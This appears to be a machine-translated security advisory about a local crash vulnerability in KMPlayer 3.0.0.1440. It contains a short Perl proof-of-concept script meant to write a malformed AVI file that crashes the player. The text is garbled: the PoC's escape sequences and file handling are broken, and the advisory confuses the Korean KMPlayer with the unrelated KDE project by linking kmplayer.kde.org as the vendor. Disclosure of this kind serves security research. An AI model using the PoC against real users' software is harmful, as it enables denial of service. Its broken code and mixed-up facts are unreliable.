KMPlayer is an all-around audio and video player from South Korea. It is transplanted from the linux platform and can play almost all audio and video files on your system. KMPlayer 3.0.0.1440 and other versions have security vulnerabilities. Local attackers can exploit this vulnerability to crash affected applications. <* See Am! R *> Test method: the programs (methods) provided by dis on this site may be offensive and only used for security research and teaching. You are at your own risk! #! /Usr/bin/perl # Title: KmPlayer v3.0.0.1440 Local Crash PoC # Discovered By: Am! R # Home: http://IrIsT.Ir/forum/#tested: XP # TNX: Alireza, C0dex, B3hz4d my $ po = "\ x46 \ x02 \ x00 \ x00"; open (C, ">: raw ", "poc. avi "); print $ po; close (C); vendor patch: KMPlayer -------- currently, the vendor has not provided patches or upgraded programs, we recommend that users who use this software stay tuned to the vendor's homepage for the latest version: http://kmplayer.kde.org/